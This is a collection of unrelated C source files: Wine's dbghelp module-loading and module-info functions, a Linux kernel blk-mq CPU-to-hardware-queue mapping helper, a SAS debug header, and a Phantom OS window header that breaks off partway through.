DWORD64 WINAPI SymLoadModuleEx(HANDLE hProcess, HANDLE hFile, PCSTR ImageName,
                               PCSTR ModuleName, DWORD64 BaseOfDll, DWORD DllSize,
                               PMODLOAD_DATA Data, DWORD Flags)
{
    PWSTR       wImageName, wModuleName;
    unsigned    len;
    DWORD64     ret;

    TRACE("(%p %p %s %s %s %08x %p %08x)\n",
          hProcess, hFile, debugstr_a(ImageName), debugstr_a(ModuleName),
          wine_dbgstr_longlong(BaseOfDll), DllSize, Data, Flags);

    /* convert the ANSI names and forward to the W variant */
    if (ImageName)
    {
        len = MultiByteToWideChar(CP_ACP, 0, ImageName, -1, NULL, 0);
        wImageName = HeapAlloc(GetProcessHeap(), 0, len * sizeof(WCHAR));
        MultiByteToWideChar(CP_ACP, 0, ImageName, -1, wImageName, len);
    }
    else wImageName = NULL;
    if (ModuleName)
    {
        len = MultiByteToWideChar(CP_ACP, 0, ModuleName, -1, NULL, 0);
        wModuleName = HeapAlloc(GetProcessHeap(), 0, len * sizeof(WCHAR));
        MultiByteToWideChar(CP_ACP, 0, ModuleName, -1, wModuleName, len);
    }
    else wModuleName = NULL;

    ret = SymLoadModuleExW(hProcess, hFile, wImageName, wModuleName,
                           BaseOfDll, DllSize, Data, Flags);
    HeapFree(GetProcessHeap(), 0, wImageName);
    HeapFree(GetProcessHeap(), 0, wModuleName);
    return ret;
}

/***********************************************************************
 *			SymLoadModuleExW (DBGHELP.@)
 */
DWORD64 WINAPI SymLoadModuleExW(HANDLE hProcess, HANDLE hFile, PCWSTR wImageName,
                                PCWSTR wModuleName, DWORD64 BaseOfDll, DWORD SizeOfDll,
                                PMODLOAD_DATA Data, DWORD Flags)
{
    struct process*     pcs;
    struct module*      module = NULL;

    TRACE("(%p %p %s %s %s %08x %p %08x)\n",
          hProcess, hFile, debugstr_w(wImageName), debugstr_w(wModuleName),
          wine_dbgstr_longlong(BaseOfDll), SizeOfDll, Data, Flags);

    if (Data)
        FIXME("Unsupported load data parameter %p for %s\n",
              Data, debugstr_w(wImageName));
    if (!validate_addr64(BaseOfDll)) return FALSE;

    if (!(pcs = process_find_by_handle(hProcess))) return FALSE;

    if (Flags & SLMFLAG_VIRTUAL)
    {
        if (!wImageName) return FALSE;
        module = module_new(pcs, wImageName, module_get_type_by_name(wImageName),
                            TRUE, BaseOfDll, SizeOfDll, 0, 0);
        if (!module) return FALSE;
        if (wModuleName) module_set_module(module, wModuleName);
        module->module.SymType = SymVirtual;

        return TRUE;
    }
    if (Flags & ~(SLMFLAG_VIRTUAL))
        FIXME("Unsupported Flags %08x for %s\n", Flags, debugstr_w(wImageName));

    refresh_module_list(pcs);

    /* this is a Wine extension to the API just to redo the synchronisation */
    if (!wImageName && !hFile) return 0;

    /* check if the module is already loaded, or if it's a builtin PE module with
     * an containing ELF module
     */
    if (wImageName)
    {
        module = module_is_already_loaded(pcs, wImageName);
        if (!module && module_is_container_loaded(pcs, wImageName, BaseOfDll))
        {
            /* force the loading of DLL as builtin */
            module = pe_load_builtin_module(pcs, wImageName, BaseOfDll, SizeOfDll);
        }
    }
    if (!module)
    {
        /* otherwise, try a regular PE module */
        if (!(module = pe_load_native_module(pcs, wImageName, hFile, BaseOfDll, SizeOfDll)) &&
            wImageName)
        {
            /* and finally an ELF or Mach-O module */
            switch (module_get_type_by_name(wImageName))
            {
                case DMT_ELF:
                    module = elf_load_module(pcs, wImageName, BaseOfDll);
                    break;
                case DMT_MACHO:
                    module = macho_load_module(pcs, wImageName, BaseOfDll);
                    break;
                default:
                    /* Ignored */
                    break;
            }
        }
    }
    if (!module)
    {
        WARN("Couldn't locate %s\n", debugstr_w(wImageName));
        return 0;
    }
    module->module.NumSyms = module->ht_symbols.num_elts;
    /* by default module_new fills module.ModuleName from a derivation
     * of LoadedImageName. Overwrite it, if we have better information
     */
    if (wModuleName)
        module_set_module(module, wModuleName);
    if (wImageName)
        lstrcpynW(module->module.ImageName, wImageName, ARRAY_SIZE(module->module.ImageName));

    return module->module.BaseOfImage;
}

/***********************************************************************
 *                     SymLoadModule64 (DBGHELP.@)
 */
DWORD64 WINAPI SymLoadModule64(HANDLE hProcess, HANDLE hFile, PCSTR ImageName,
                               PCSTR ModuleName, DWORD64 BaseOfDll, DWORD SizeOfDll)
{
    return SymLoadModuleEx(hProcess, hFile, ImageName, ModuleName,
                           BaseOfDll, SizeOfDll, NULL, 0);
}

/******************************************************************
 *		module_remove
 *
 */
BOOL module_remove(struct process* pcs, struct module* module)
{
    struct module_format*modfmt;
    struct module**     p;
    unsigned            i;

    TRACE("%s (%p)\n", debugstr_w(module->module.ModuleName), module);

    /* let each debug-format backend release its per-module state */
    for (i = 0; i < DFI_LAST; i++)
    {
        if ((modfmt = module->format_info[i]) && modfmt->remove)
            modfmt->remove(pcs, module->format_info[i]);
    }
    hash_table_destroy(&module->ht_symbols);
    hash_table_destroy(&module->ht_types);
    HeapFree(GetProcessHeap(), 0, module->sources);
    HeapFree(GetProcessHeap(), 0, module->addr_sorttab);
    pool_destroy(&module->pool);
    /* native dbghelp doesn't invoke registered callback(,CBA_SYMBOLS_UNLOADED,) here
     * so do we
     */
    for (p = &pcs->lmodules; *p; p = &(*p)->next)
    {
        if (*p == module)
        {
            *p = module->next;
            HeapFree(GetProcessHeap(), 0, module);
            return TRUE;
        }
    }
    FIXME("This shouldn't happen\n");
    return FALSE;
}

/******************************************************************
 *		SymUnloadModule (DBGHELP.@)
 *
 */
BOOL WINAPI SymUnloadModule(HANDLE hProcess, DWORD BaseOfDll)
{
    struct process*     pcs;
    struct module*      module;

    pcs = process_find_by_handle(hProcess);
    if (!pcs) return FALSE;
    module = module_find_by_addr(pcs, BaseOfDll, DMT_UNKNOWN);
    if (!module) return FALSE;
    return module_remove(pcs, module);
}

/******************************************************************
 *		SymUnloadModule64 (DBGHELP.@)
 *
 */
BOOL WINAPI SymUnloadModule64(HANDLE hProcess, DWORD64 BaseOfDll)
{
    struct process*     pcs;
    struct module*      module;

    pcs = process_find_by_handle(hProcess);
    if (!pcs) return FALSE;
    if (!validate_addr64(BaseOfDll)) return FALSE;
    module = module_find_by_addr(pcs, BaseOfDll, DMT_UNKNOWN);
    if (!module) return FALSE;
    return module_remove(pcs, module);
}

/******************************************************************
 *		SymEnumerateModules (DBGHELP.@)
 *
 */
struct enum_modW64_32
{
    PSYM_ENUMMODULES_CALLBACK   cb;     /* client's ANSI/32-bit callback */
    PVOID                       user;
    char                        module[MAX_PATH];
};

/* Thunk: convert the wide name to ANSI and the base to 32 bit, then
 * invoke the client callback. */
static BOOL CALLBACK enum_modW64_32(PCWSTR name, DWORD64 base, PVOID user)
{
    struct enum_modW64_32*      x = user;

    WideCharToMultiByte(CP_ACP, 0, name, -1, x->module, sizeof(x->module), NULL, NULL);
    return x->cb(x->module, (DWORD)base, x->user);
}

BOOL  WINAPI SymEnumerateModules(HANDLE hProcess,
                                 PSYM_ENUMMODULES_CALLBACK EnumModulesCallback,
                                 PVOID UserContext)
{
    struct enum_modW64_32       x;

    x.cb = EnumModulesCallback;
    x.user = UserContext;

    return SymEnumerateModulesW64(hProcess, enum_modW64_32, &x);
}

/******************************************************************
 *		SymEnumerateModules64 (DBGHELP.@)
 *
 */
struct enum_modW64_64
{
    PSYM_ENUMMODULES_CALLBACK64 cb;     /* client's ANSI/64-bit callback */
    PVOID                       user;
    char                        module[MAX_PATH];
};

/* Thunk: convert the wide name to ANSI, then invoke the client callback. */
static BOOL CALLBACK enum_modW64_64(PCWSTR name, DWORD64 base, PVOID user)
{
    struct enum_modW64_64*      x = user;

    WideCharToMultiByte(CP_ACP, 0,
name, -1, x->module, sizeof(x->module), NULL, NULL); return x->cb(x->module, base, x->user); } BOOL WINAPI SymEnumerateModules64(HANDLE hProcess, PSYM_ENUMMODULES_CALLBACK64 EnumModulesCallback, PVOID UserContext) { struct enum_modW64_64 x; x.cb = EnumModulesCallback; x.user = UserContext; return SymEnumerateModulesW64(hProcess, enum_modW64_64, &x); } /****************************************************************** * SymEnumerateModulesW64 (DBGHELP.@) * */ BOOL WINAPI SymEnumerateModulesW64(HANDLE hProcess, PSYM_ENUMMODULES_CALLBACKW64 EnumModulesCallback, PVOID UserContext) { struct process* pcs = process_find_by_handle(hProcess); struct module* module; if (!pcs) return FALSE; for (module = pcs->lmodules; module; module = module->next) { if (!dbghelp_opt_native && (module->type == DMT_ELF || module->type == DMT_MACHO)) continue; if (!EnumModulesCallback(module->modulename, module->module.BaseOfImage, UserContext)) break; } return TRUE; } /****************************************************************** * EnumerateLoadedModules64 (DBGHELP.@) * */ struct enum_load_modW64_64 { PENUMLOADED_MODULES_CALLBACK64 cb; PVOID user; char module[MAX_PATH]; }; static BOOL CALLBACK enum_load_modW64_64(PCWSTR name, DWORD64 base, ULONG size, PVOID user) { struct enum_load_modW64_64* x = user; WideCharToMultiByte(CP_ACP, 0, name, -1, x->module, sizeof(x->module), NULL, NULL); return x->cb(x->module, base, size, x->user); } BOOL WINAPI EnumerateLoadedModules64(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOID UserContext) { struct enum_load_modW64_64 x; x.cb = EnumLoadedModulesCallback; x.user = UserContext; return EnumerateLoadedModulesW64(hProcess, enum_load_modW64_64, &x); } /****************************************************************** * EnumerateLoadedModules (DBGHELP.@) * */ struct enum_load_modW64_32 { PENUMLOADED_MODULES_CALLBACK cb; PVOID user; char module[MAX_PATH]; }; static BOOL CALLBACK enum_load_modW64_32(PCWSTR name, DWORD64 
base, ULONG size, PVOID user) { struct enum_load_modW64_32* x = user; WideCharToMultiByte(CP_ACP, 0, name, -1, x->module, sizeof(x->module), NULL, NULL); return x->cb(x->module, (DWORD)base, size, x->user); } BOOL WINAPI EnumerateLoadedModules(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK EnumLoadedModulesCallback, PVOID UserContext) { struct enum_load_modW64_32 x; x.cb = EnumLoadedModulesCallback; x.user = UserContext; return EnumerateLoadedModulesW64(hProcess, enum_load_modW64_32, &x); } /****************************************************************** * EnumerateLoadedModulesW64 (DBGHELP.@) * */ BOOL WINAPI EnumerateLoadedModulesW64(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext) { HMODULE* hMods; WCHAR baseW[256], modW[256]; DWORD i, sz; MODULEINFO mi; hMods = HeapAlloc(GetProcessHeap(), 0, 256 * sizeof(hMods[0])); if (!hMods) return FALSE; if (!EnumProcessModules(hProcess, hMods, 256 * sizeof(hMods[0]), &sz)) { /* hProcess should also be a valid process handle !! 
*/ FIXME("If this happens, bump the number in mod\n"); HeapFree(GetProcessHeap(), 0, hMods); return FALSE; } sz /= sizeof(HMODULE); for (i = 0; i < sz; i++) { if (!GetModuleInformation(hProcess, hMods[i], &mi, sizeof(mi)) || !GetModuleBaseNameW(hProcess, hMods[i], baseW, ARRAY_SIZE(baseW))) continue; module_fill_module(baseW, modW, ARRAY_SIZE(modW)); EnumLoadedModulesCallback(modW, (DWORD_PTR)mi.lpBaseOfDll, mi.SizeOfImage, UserContext); } HeapFree(GetProcessHeap(), 0, hMods); return sz != 0 && i == sz; } static void dbghelp_str_WtoA(const WCHAR *src, char *dst, int dst_len) { WideCharToMultiByte(CP_ACP, 0, src, -1, dst, dst_len - 1, NULL, NULL); dst[dst_len - 1] = 0; } /****************************************************************** * SymGetModuleInfo (DBGHELP.@) * */ BOOL WINAPI SymGetModuleInfo(HANDLE hProcess, DWORD dwAddr, PIMAGEHLP_MODULE ModuleInfo) { IMAGEHLP_MODULE mi; IMAGEHLP_MODULEW64 miw64; if (sizeof(mi) < ModuleInfo->SizeOfStruct) FIXME("Wrong size\n"); miw64.SizeOfStruct = sizeof(miw64); if (!SymGetModuleInfoW64(hProcess, dwAddr, &miw64)) return FALSE; mi.SizeOfStruct = ModuleInfo->SizeOfStruct; mi.BaseOfImage = miw64.BaseOfImage; mi.ImageSize = miw64.ImageSize; mi.TimeDateStamp = miw64.TimeDateStamp; mi.CheckSum = miw64.CheckSum; mi.NumSyms = miw64.NumSyms; mi.SymType = miw64.SymType; dbghelp_str_WtoA(miw64.ModuleName, mi.ModuleName, sizeof(mi.ModuleName)); dbghelp_str_WtoA(miw64.ImageName, mi.ImageName, sizeof(mi.ImageName)); dbghelp_str_WtoA(miw64.LoadedImageName, mi.LoadedImageName, sizeof(mi.LoadedImageName)); memcpy(ModuleInfo, &mi, ModuleInfo->SizeOfStruct); return TRUE; } /****************************************************************** * SymGetModuleInfoW (DBGHELP.@) * */ BOOL WINAPI SymGetModuleInfoW(HANDLE hProcess, DWORD dwAddr, PIMAGEHLP_MODULEW ModuleInfo) { IMAGEHLP_MODULEW64 miw64; IMAGEHLP_MODULEW miw; if (sizeof(miw) < ModuleInfo->SizeOfStruct) FIXME("Wrong size\n"); miw64.SizeOfStruct = sizeof(miw64); if 
(!SymGetModuleInfoW64(hProcess, dwAddr, &miw64)) return FALSE; miw.SizeOfStruct = ModuleInfo->SizeOfStruct; miw.BaseOfImage = miw64.BaseOfImage; miw.ImageSize = miw64.ImageSize; miw.TimeDateStamp = miw64.TimeDateStamp; miw.CheckSum = miw64.CheckSum; miw.NumSyms = miw64.NumSyms; miw.SymType = miw64.SymType; strcpyW(miw.ModuleName, miw64.ModuleName); strcpyW(miw.ImageName, miw64.ImageName); strcpyW(miw.LoadedImageName, miw64.LoadedImageName); memcpy(ModuleInfo, &miw, ModuleInfo->SizeOfStruct); return TRUE; } /****************************************************************** * SymGetModuleInfo64 (DBGHELP.@) * */ BOOL WINAPI SymGetModuleInfo64(HANDLE hProcess, DWORD64 dwAddr, PIMAGEHLP_MODULE64 ModuleInfo) { IMAGEHLP_MODULE64 mi64; IMAGEHLP_MODULEW64 miw64; if (sizeof(mi64) < ModuleInfo->SizeOfStruct) { SetLastError(ERROR_MOD_NOT_FOUND); /* NOTE: native returns this error */ WARN("Wrong size %u\n", ModuleInfo->SizeOfStruct); return FALSE; } miw64.SizeOfStruct = sizeof(miw64); if (!SymGetModuleInfoW64(hProcess, dwAddr, &miw64)) return FALSE; mi64.SizeOfStruct = ModuleInfo->SizeOfStruct; mi64.BaseOfImage = miw64.BaseOfImage; mi64.ImageSize = miw64.ImageSize; mi64.TimeDateStamp = miw64.TimeDateStamp; mi64.CheckSum = miw64.CheckSum; mi64.NumSyms = miw64.NumSyms; mi64.SymType = miw64.SymType; dbghelp_str_WtoA(miw64.ModuleName, mi64.ModuleName, sizeof(mi64.ModuleName)); dbghelp_str_WtoA(miw64.ImageName, mi64.ImageName, sizeof(mi64.ImageName)); dbghelp_str_WtoA(miw64.LoadedImageName, mi64.LoadedImageName, sizeof(mi64.LoadedImageName)); dbghelp_str_WtoA(miw64.LoadedPdbName, mi64.LoadedPdbName, sizeof(mi64.LoadedPdbName)); mi64.CVSig = miw64.CVSig; dbghelp_str_WtoA(miw64.CVData, mi64.CVData, sizeof(mi64.CVData)); mi64.PdbSig = miw64.PdbSig; mi64.PdbSig70 = miw64.PdbSig70; mi64.PdbAge = miw64.PdbAge; mi64.PdbUnmatched = miw64.PdbUnmatched; mi64.DbgUnmatched = miw64.DbgUnmatched; mi64.LineNumbers = miw64.LineNumbers; mi64.GlobalSymbols = miw64.GlobalSymbols; mi64.TypeInfo = 
miw64.TypeInfo; mi64.SourceIndexed = miw64.SourceIndexed; mi64.Publics = miw64.Publics; memcpy(ModuleInfo, &mi64, ModuleInfo->SizeOfStruct); return TRUE; } /****************************************************************** * SymGetModuleInfoW64 (DBGHELP.@) * */ BOOL WINAPI SymGetModuleInfoW64(HANDLE hProcess, DWORD64 dwAddr, PIMAGEHLP_MODULEW64 ModuleInfo) { struct process* pcs = process_find_by_handle(hProcess); struct module* module; IMAGEHLP_MODULEW64 miw64; TRACE("%p %s %p\n", hProcess, wine_dbgstr_longlong(dwAddr), ModuleInfo); if (!pcs) return FALSE; if (ModuleInfo->SizeOfStruct > sizeof(*ModuleInfo)) return FALSE; module = module_find_by_addr(pcs, dwAddr, DMT_UNKNOWN); if (!module) return FALSE; miw64 = module->module; /* update debug information from container if any */ if (module->module.SymType == SymNone) { module = module_get_container(pcs, module); if (module && module->module.SymType != SymNone) { miw64.SymType = module->module.SymType; miw64.NumSyms = module->module.NumSyms; } } memcpy(ModuleInfo, &miw64, ModuleInfo->SizeOfStruct); return TRUE; } /*********************************************************************** * SymGetModuleBase (DBGHELP.@) */ DWORD WINAPI SymGetModuleBase(HANDLE hProcess, DWORD dwAddr) { DWORD64 ret; ret = SymGetModuleBase64(hProcess, dwAddr); return validate_addr64(ret) ? ret : 0; } /*********************************************************************** * SymGetModuleBase64 (DBGHELP.@) */ DWORD64 WINAPI SymGetModuleBase64(HANDLE hProcess, DWORD64 dwAddr) { struct process* pcs = process_find_by_handle(hProcess); struct module* module; if (!pcs) return 0; module = module_find_by_addr(pcs, dwAddr, DMT_UNKNOWN); if (!module) return 0; return module->module.BaseOfImage; } /****************************************************************** * module_reset_debug_info * Removes any debug information linked to a given module. 
*/ void module_reset_debug_info(struct module* module) { module->sortlist_valid = TRUE; module->sorttab_size = 0; module->addr_sorttab = NULL; module->num_sorttab = module->num_symbols = 0; hash_table_destroy(&module->ht_symbols); module->ht_symbols.num_buckets = 0; module->ht_symbols.buckets = NULL; hash_table_destroy(&module->ht_types); module->ht_types.num_buckets = 0; module->ht_types.buckets = NULL; module->vtypes.num_elts = 0; hash_table_destroy(&module->ht_symbols); module->sources_used = module->sources_alloc = 0; module->sources = NULL; } /****************************************************************** * SymRefreshModuleList (DBGHELP.@) */ BOOL WINAPI SymRefreshModuleList(HANDLE hProcess) { struct process* pcs; TRACE("(%p)\n", hProcess); if (!(pcs = process_find_by_handle(hProcess))) return FALSE; return refresh_module_list(pcs); } /*********************************************************************** * SymFunctionTableAccess (DBGHELP.@) */ PVOID WINAPI SymFunctionTableAccess(HANDLE hProcess, DWORD AddrBase) { return SymFunctionTableAccess64(hProcess, AddrBase); } /*********************************************************************** * SymFunctionTableAccess64 (DBGHELP.@) */ PVOID WINAPI SymFunctionTableAccess64(HANDLE hProcess, DWORD64 AddrBase) { struct process* pcs = process_find_by_handle(hProcess); struct module* module; if (!pcs || !dbghelp_current_cpu->find_runtime_function) return NULL; module = module_find_by_addr(pcs, AddrBase, DMT_UNKNOWN); if (!module) return NULL; return dbghelp_current_cpu->find_runtime_function(module, AddrBase); }
{ "language": "C" }
// SPDX-License-Identifier: GPL-2.0 /* * CPU <-> hardware queue mapping helpers * * Copyright (C) 2013-2014 Jens Axboe */ #include <linux/kernel.h> #include <linux/threads.h> #include <linux/module.h> #include <linux/mm.h> #include <linux/smp.h> #include <linux/cpu.h> #include <linux/blk-mq.h> #include "blk.h" #include "blk-mq.h" static int queue_index(struct blk_mq_queue_map *qmap, unsigned int nr_queues, const int q) { return qmap->queue_offset + (q % nr_queues); } static int get_first_sibling(unsigned int cpu) { unsigned int ret; ret = cpumask_first(topology_sibling_cpumask(cpu)); if (ret < nr_cpu_ids) return ret; return cpu; } int blk_mq_map_queues(struct blk_mq_queue_map *qmap) { unsigned int *map = qmap->mq_map; unsigned int nr_queues = qmap->nr_queues; unsigned int cpu, first_sibling, q = 0; for_each_possible_cpu(cpu) map[cpu] = -1; /* * Spread queues among present CPUs first for minimizing * count of dead queues which are mapped by all un-present CPUs */ for_each_present_cpu(cpu) { if (q >= nr_queues) break; map[cpu] = queue_index(qmap, nr_queues, q++); } for_each_possible_cpu(cpu) { if (map[cpu] != -1) continue; /* * First do sequential mapping between CPUs and queues. * In case we still have CPUs to map, and we have some number of * threads per cores then map sibling threads to the same queue * for performance optimizations. */ if (q < nr_queues) { map[cpu] = queue_index(qmap, nr_queues, q++); } else { first_sibling = get_first_sibling(cpu); if (first_sibling == cpu) map[cpu] = queue_index(qmap, nr_queues, q++); else map[cpu] = map[first_sibling]; } } return 0; } EXPORT_SYMBOL_GPL(blk_mq_map_queues); /** * blk_mq_hw_queue_to_node - Look up the memory node for a hardware queue index * @qmap: CPU to hardware queue map. * @index: hardware queue index. * * We have no quick way of doing reverse lookups. This is only used at * queue init time, so runtime isn't important. 
*/ int blk_mq_hw_queue_to_node(struct blk_mq_queue_map *qmap, unsigned int index) { int i; for_each_possible_cpu(i) { if (index == qmap->mq_map[i]) return local_memory_node(cpu_to_node(i)); } return NUMA_NO_NODE; }
{ "language": "C" }
/*
 * Serial Attached SCSI (SAS) Dump/Debugging routines header file
 *
 * Copyright (C) 2005 Adaptec, Inc.  All rights reserved.
 * Copyright (C) 2005 Luben Tuikov <luben_tuikov@adaptec.com>
 *
 * This file is licensed under GPLv2.
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License as
 * published by the Free Software Foundation; either version 2 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
 *
 */

#include "sas_internal.h"

/* NOTE(review): this header has no include guard; presumably it is only
 * included once per translation unit -- confirm that is intentional. */

/* Debug-dump a port event @pe reported for phy @phyid. */
void sas_dprint_porte(int phyid, enum port_event pe);
/* Debug-dump a phy event @pe reported for phy @phyid. */
void sas_dprint_phye(int phyid, enum phy_event pe);
/* Debug-dump a host-adapter event @he for @sas_ha. */
void sas_dprint_hae(struct sas_ha_struct *sas_ha, enum ha_event he);
/* Debug-dump the state of @port. */
void sas_dump_port(struct asd_sas_port *port);
{ "language": "C" }
/** * * Phantom OS * * Copyright (C) 2005-2011 Phantom OS team * Copyright (C) 2005-2019 Dmitry Zavalishin, dz@dz.ru * * Window. * **/ #ifndef WINDOW_H #define WINDOW_H #ifndef VCONFIG_H #include <video/vconfig.h> #endif // VCONFIG_H #include <phantom_types.h> #include <queue.h> #include <video/color.h> #include <video/bitmap.h> #include <event.h> #include <kernel/pool.h> #define VIDEO_T_IN_D 0 typedef struct drv_video_window * window_handle_t; typedef pool_handle_t taskbar_handle_t; // Win flags supposed to stay the same #define WFLAG_WIN_DECORATED (1<<0) // This is temp win, not included in allwindows list #define WFLAG_WIN_NOTINALL (1<<1) // Don't bring focus to this window #define WFLAG_WIN_NOFOCUS (1<<2) // Don't free window pixels #define WFLAG_WIN_NOPIXELS (1<<3) // Can not treat all pixels alpha as 0xFF #define WFLAG_WIN_NOTOPAQUE (1<<4) // Must be on top of all others #define WFLAG_WIN_ONTOP (1<<5) // Double buffered window #define WFLAG_WIN_DOUBLEBUF (1<<6) // In double buffered mode window is supposed to completely // repaint itself each buffer swap. No buffer copy occures. 
#define WFLAG_WIN_FULLPAINT (1<<7) // Don't bring focus to this window by key event (ctrl-tab) #define WFLAG_WIN_NOKEYFOCUS (1<<8) // Put this window to task bar - it is a main application window - UNIMPL yet #define WFLAG_WIN_TASK_BAR (1<<9) // For menu - hide if focus is gone #define WFLAG_WIN_HIDE_ON_FOCUS_LOSS (1<<10) #define WIN_HAS_FLAG(__w,__f) ((__w)->flags & (__f)) // Win state can change frequently #define WSTATE_WIN_FOCUSED (1<<0) #define WSTATE_WIN_DRAGGED (1<<1) #define WSTATE_WIN_VISIBLE (1<<2) #define WSTATE_WIN_ROLLEDUP (1<<3) // No one is above #define WSTATE_WIN_UNCOVERED (1<<8) // Pixels live in graphics device's framebuf - can use hw blitter #define WSTATE_WIN_INFB (1<<9) // Default button ids #define WBUTTON_SYS(id) (0xFFFF|((id)<<16)) #define WBUTTON_SYS_ROLLUP WBUTTON_SYS(0) #define WBUTTON_SYS_CLOSE WBUTTON_SYS(1) // ----------------------------------------------------------------------- // Window struct // ----------------------------------------------------------------------- /** * * Main structure representing window. * * SNAPSHOT WARNING: this structure is used in snapshotted objects. * If you change it, old snapshots are invalid. Be careful. * * * **/ typedef struct drv_video_window { int xsize; //< Pixels int ysize; int x, y, z; //< On screen int dx, dy; //< Drag base (see titleMouseEventProcessor) int flags; //< Not supposed to change during window's life int state; //< Can change anytime queue_chain_t chain; //< All windows are on this chain int li, ti, ri, bi; //< insets - unused? rgba_t bg; //< background color const char* title; queue_head_t events; //< Incoming events volatile int events_count; //< To prevent overfill of dead window q int stall; //< True if event queue is overloaded and events are being lost /*! * Called from main event dispatch thread after event is placed to * window event queue. Supposed to process event or trigger waiting * thread to do that. 
*/ int (*inKernelEventProcess)( struct drv_video_window *w, struct ui_event *e ); hal_sem_t *eventDeliverSema; //< If not null - signalled on new event in win q tid_t owner; #if !VIDEO_T_IN_D struct drv_video_window *w_title; //< Child window - title #endif struct drv_video_window *w_decor; //< Child window - decorations struct drv_video_window *w_owner; //< My parent window - i am decor/title pool_t *controls; //< Attached UI controls taskbar_handle_t task_bar_h; //< Me it task bar window_handle_t context_menu; //< Default window context menu rgba_t *r_pixel; //< read ptr - for blit to screen rgba_t *w_pixel; //< write ptr - for painting rgba_t *buf[2]; //< 1st/2nd halves ptrs for dbl buf switch #if VIDEO_DOUBLE_BUF #else //#define r_pixel pixels //#define w_pixel pixels #endif // bitmap itself rgba_t *bitmap; } drv_video_window_t; // returns nonzero if rect is out of window int rect_win_bounds( rect_t *r, drv_video_window_t *w ); // returns nonzero if point is in window int point_in_win( int x, int y, drv_video_window_t *w ); // ------------------------------------------------------------------------ // Window interface // ------------------------------------------------------------------------ //! 
malloc value to create drv_video_window_t // * 2 is for double buffered mode static __inline__ int drv_video_window_bytes( int xsize, int ysize ) { return (sizeof(rgba_t) * xsize * ysize * 2) + sizeof(drv_video_window_t); } // dynamic allocation drv_video_window_t *drv_video_window_create(int xsize, int ysize, int x, int y, rgba_t bg, const char* title, int flags ); // free dynamically allocated window void drv_video_window_free(drv_video_window_t *w); // init for statically allocated ones void drv_video_window_init( drv_video_window_t *w, void *pixels, int xsize, int ysize, int x, int y, rgba_t bg, int flags, const char *title ); // destroy for statically allocated ones void drv_video_window_destroy(drv_video_window_t *w); void w_to_top(window_handle_t w); void w_to_bottom(window_handle_t w); void w_clear( window_handle_t win ); void w_fill( window_handle_t win, rgba_t color ); void w_draw_rect( window_handle_t win, rgba_t color, rect_t r ); void w_fill_rect( window_handle_t win, rgba_t color, rect_t r ); //#define w_draw_pixel w_pixel void w_draw_pixel( window_handle_t w, int x, int y, rgba_t color ); void w_draw_line( window_handle_t w, int x1, int y1, int x2, int y2, rgba_t c); void w_fill_ellipse( window_handle_t w, int x,int y,int lx,int ly, rgba_t c); void w_fill_box( window_handle_t w, int x,int y,int lx,int ly, rgba_t c); void w_draw_box( window_handle_t w, int x,int y,int lx,int ly, rgba_t c); void w_draw_bitmap( window_handle_t w, int x, int y, drv_video_bitmap_t *bmp ); void w_draw_blend_bitmap( drv_video_window_t *w, int x, int y, drv_video_bitmap_t *bmp ); //< Draw with alpha blending void w_move( window_handle_t w, int x, int y ); errno_t w_scroll_hor( window_handle_t w, int x, int y, int xs, int ys, int s ); void w_scroll_up( window_handle_t win, int npix, rgba_t color); void w_set_title( window_handle_t w, const char *title ); void w_get_bounds( window_handle_t w, rect_t *out ); void w_set_visible( window_handle_t h, int v ); void w_set_bg_color( 
window_handle_t w, rgba_t color ); /** * * Resize window - tricky! * * Warning - caller must check buffer size! * * It is up to caller to be sure that window has enough * place in its allocated memory for new size. If it is * not so, caller must allocate and pass new buffer. * * Use drv_video_window_bytes() to find correct size of * video memory for window, add sizeof(window_handle_t) * * \param[in] w Window to resize * \param[in] xsize New width * \param[in] ysize New height * \param[in] new_buffer Zero if old memory is big enough for a new size, or new buffer. * \param[in] clear Do not attempt to save contents, clear with bg color. * **/ void w_resize_ext( window_handle_t w, int xsize, int ysize, void *new_buffer, int clear ); // ----------------------------------------------------------------------- // Getters for state // ----------------------------------------------------------------------- #define w_is_in_focus(w) ({ ((w)->state) & WSTATE_WIN_FOCUSED; }) #define w_is_visible(w) ({ ((w)->state) & WSTATE_WIN_VISIBLE; }) /// Is one of topmost - i.e. covered only by WFLAG_WIN_ONTOP ones int w_is_top(drv_video_window_t *w); // ----------------------------------------------------------------------- // Globals - TODO move away // ----------------------------------------------------------------------- extern queue_head_t allwindows; extern window_handle_t focused_window; // ----------------------------------------------------------------------- // Task bar // ----------------------------------------------------------------------- /** * * Add window to task bar. Task bar will control window visibility. * Also, application can control image in task bar by changing * task bar icon with w_set_task_bar_icon. 
* **/ taskbar_handle_t w_add_to_task_bar( window_handle_t w ); taskbar_handle_t w_add_to_task_bar_icon( window_handle_t w, drv_video_bitmap_t *icon ); taskbar_handle_t w_add_to_task_bar_ext( window_handle_t w, drv_video_bitmap_t *icon, drv_video_bitmap_t *n_bmp, drv_video_bitmap_t *p_bmp, drv_video_bitmap_t *h_bmp ); void w_set_task_bar_icon( window_handle_t w, drv_video_bitmap_t *bmp ); //! Not impl yet - displays a marker with a number aside to icon top void w_set_task_bar_note( window_handle_t w, int n_of_outstanding_events ); //void w_set_task_bar_menu( window_handle_t w, window_handle_t m ); errno_t w_remove_from_task_bar( window_handle_t w ); /// Add marker in taskbar telling that window needs attention void w_add_notification( window_handle_t w, int count_to_add ); /// Remove marker. Also automativally called on bringing window to top void w_reset_notification( window_handle_t w ); void w_set_task_bar_menu( window_handle_t w, window_handle_t m ); // ----------------------------------------------------------------------- // Internals // ----------------------------------------------------------------------- window_handle_t drv_video_next_window(window_handle_t curr); void win2blt_flags( u_int32_t *flags, const window_handle_t w ); // ----------------------------------------------------------------------- // Persistent mem support // ----------------------------------------------------------------------- //! Called from object restart code to reinit window struct //! contained in VM object. This func just clears pointers. //! After calling this func you must reset all the required //! fields and call w_restart_attach( w ) //! to add window to in-kernel lists and repaint it. 